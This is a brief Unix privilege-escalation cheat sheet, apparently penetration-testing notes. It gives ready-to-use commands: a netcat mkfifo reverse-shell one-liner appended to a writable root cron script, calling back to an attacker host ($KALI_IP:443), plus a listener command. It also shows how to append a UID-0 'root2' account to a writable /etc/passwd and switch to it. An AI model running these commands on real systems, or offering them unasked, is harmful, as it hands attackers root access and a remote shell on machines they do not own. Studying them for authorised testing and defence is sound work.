Privilege escalation techniques on Unix. Exploit insecure file permissions on services that run as root or service accounts with more privileges.
Scheduled Jobs
Locate an executable file that is writable by the current user AND runs at an elevated privilege level.
grep "CRON" /var/log/cron.logUse the reverse shell cheat sheet one-liners from PentestMonkey and edit the script to obtain a reverse shell with elevated privileges.
echo >> <filename>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI_IP 443 >/tmp/f" >> <filename>
cat <filename>
Start a listener.
sudo nc -lnvp 443/etc/passwd
Password hashes are usually stored in /etc/shadow, but can be stored in the second column of /etc/passwd for backward compatibility. It takes precedence over /etc/shadow.
Check permissions on /etc/passwd (need write permission)
ls -la /etc/passwdGenerate a password hash for /etc/passwd
openssl passwd <some password>Add a new super user
Superuser accounts in Linux have a user id (UID) and group id (GID) of 0.
echo "root2:<password hash>:0:0:root:/root:/bin/bash" >> /etc/passwdsu root2